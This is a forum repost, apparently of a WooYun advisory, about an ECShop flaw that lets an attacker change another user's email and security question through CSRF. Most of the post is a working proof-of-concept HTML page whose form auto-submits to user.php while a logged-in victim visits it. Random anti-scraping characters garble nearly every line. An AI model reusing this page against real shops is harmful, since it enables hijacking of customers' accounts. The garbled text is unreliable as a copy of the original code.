中国网络渗透测试联盟

标题: ecshop修改任意用户密码漏洞的CSRF利用 [打印本页]

作者: admin    时间: 2013-2-20 08:30
标题: ecshop修改任意用户密码漏洞的CSRF利用
简要描述:
$ f3 G) Y( `1 L# Decshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现. e' c% B2 J# k; z% }
* {' L- `* W$ {; K
Demo For:http://www.wooyun.org/bug.php?action=view&id=3958 v6 `+ x, N) F, p* g. _
1 }1 m9 W: g" p9 Y& `' V
详细说明:
' n2 f/ u7 K7 B" y/ y利用csrf和xss可以突破官方所说的“障碍”
7 \, h# o( t- ^" fxss版本已经有人说明
+ G4 A9 M2 m- [% \9 L9 D这里给出csrf版本
. K4 ?- O1 U9 u: f  ~# W1 Z2 l, g- @
漏洞证明:, b) K" ~& r: L, L
<html>3 d) m, @. t0 A+ J: `$ ^/ W" K
<body>
2 u" m8 ]$ q! W! U$ i<form action="http://www.wooyun.org/ecshop/user.php" method="POST">/ [; L. v& H1 A5 e3 S! f
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
, S! m. F; E: Y+ D, I( o<INPUT TYPE="text" NAME="act" value="act_edit_profile">
* Y! ]/ c& K, m2 M- i<INPUT TYPE="text" NAME="sel_question" value="ecshop">5 l1 H* M6 r) F/ o3 P. U
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
. G% }+ v# Y! S/ c8 U5 d</body>
- w# S, Q2 J# O; V* V  K: X) K/ X<script>
" A, L( z& N/ @& b: k( G7 idocument.forms[0].submit();
" E" c) {$ j4 J0 v9 T- [% Z</script>
8 k; }. d6 }1 B</html>
2 _, u0 ^0 S9 Q& Q$ N构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失: [: k9 v- D4 n0 n1 q+ H4 B

, A/ q+ {& R2 X& u& O




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2